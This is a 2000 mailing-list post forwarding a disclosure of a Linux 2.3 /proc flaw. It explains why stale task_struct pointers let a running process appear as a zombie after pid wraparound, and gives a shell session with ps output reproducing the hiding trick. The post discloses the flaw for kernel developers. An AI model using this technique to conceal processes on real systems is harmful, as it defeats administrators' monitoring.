Date: Fri, 17 Mar 2000 00:56:47 +0100 (MET) From: Pavel Kankovsky <peak@argo.troja.mff.cuni.cz> To: security-audit@ferret.lmh.ox.ac.uk Subject: Process hiding in linux (fwd) That exec() thing reminded me of another kernel problem (limited to 2.3 ...fortunately) Pavel Machek and I discovered recently. Some background: /proc/NNN inodes in 2.3 keep a pointer to task_struct (earlies versions used a pid computed from an inode number to look up that pointer during every fs operation). This makes /proc in 2.3 resistant against pid recycling attacks because old fds would always access the original zombified task_struct (that is garbage collected when its reference count drops to zero). Unfortunately, it makes /proc vulnerable to these attacks put upside-down: because the old task_struct pointer is stored in the inode, new fds access the old process as well until the kernel gets rid of the inode but this will not happen until all old fds are closed. A lesson learned: when an old trick fails, try out its exact opposite. --Pavel Kankovsky aka Peak [ Boycott Microsoft--http://www.vcnet.com/bms ] "Resistance is futile. Open your source code and prepare for assimilation." ---------- Forwarded message ---------- Date: Mon, 13 Mar 2000 22:38:38 +0100 From: Pavel Machek <pavel@ucw.cz> To: peak@kerberos.troja.mff.cuni.cz, pavel@ucw.cz, viro@math.psu.edu, linux-kernel@vger.rutgers.edu Subject: Process hiding in linux Hi! /proc/pid allows strange tricks (2.3.49): pavel@bug:~/misc$ while1 & [1] 1349 pavel@bug:~/misc$ delayed_cat /proc/1349/status [2]+ Stopped delayed_cat /proc/1349/status pavel@bug:~/misc$ ./phide [spawns 32450 processes and lets them exit] pavel@bug:~/misc$ kill -9 1349 pavel@bug:~/misc$ ps aux | grep grep Warning: /boot/System.map has an incorrect kernel version. Warning: /usr/src/linux/System.map has an incorrect kernel version. pavel 1337 0.0 0.5 844 336 tty1 S 22:29 0:00 grep grep [1]- Killed while1 [repeating so we are near wrapparound] pavel@bug:~/misc$ ps aux | grep grep Warning: /boot/System.map has an incorrect kernel version. Warning: /usr/src/linux/System.map has an incorrect kernel version. pavel 1347 0.0 0.5 844 336 tty1 S 22:30 0:00 grep grep pavel@bug:~/misc$ while1 & while1 & while1 & while1 & while1 & [3] 1348 [4] 1349 [5] 1351 [6] 1352 [7] 1353 pavel@bug:~/misc$ kill 1348 1351 1352 1353 *Then* on the other console: So what we have is process 1350 *hiding* process 1349. (Process apears on listings, but it is marked as zombie, while it is running in the background.) pavel@bug:~$ ps aux | grep 1349 Warning: /boot/System.map has an incorrect kernel version. Warning: /usr/src/linux/System.map has an incorrect kernel version. pavel 1350 0.0 0.3 724 224 tty1 T 22:28 0:00 delayed_cat /proc/1349/status pavel 1349 12.1 0.0 0 0 tty1 Z 22:28 0:34 [while1 <defunct>] pavel 1361 0.0 0.5 844 332 tty2 S 22:33 0:00 grep 1349 pavel@bug:~$ kill -9 1350 pavel@bug:~$ ps aux | grep 1349 Warning: /boot/System.map has an incorrect kernel version. Warning: /usr/src/linux/System.map has an incorrect kernel version. pavel 1349 88.2 0.3 720 216 tty1 R 22:30 2:46 while1 pavel 1363 0.0 0.5 844 332 tty2 S 22:33 0:00 grep 1349 pavel@bug:~$ Pavel PS: It was Pavel Kankovsky who told me something like this might be possible. I believe this is security problem. -- I'm pavel@ucw.cz. "In my country we have almost anarchy and I don't care." Panos Katsaloulis describing me w.r.t. patents me at discuss@linmodems.org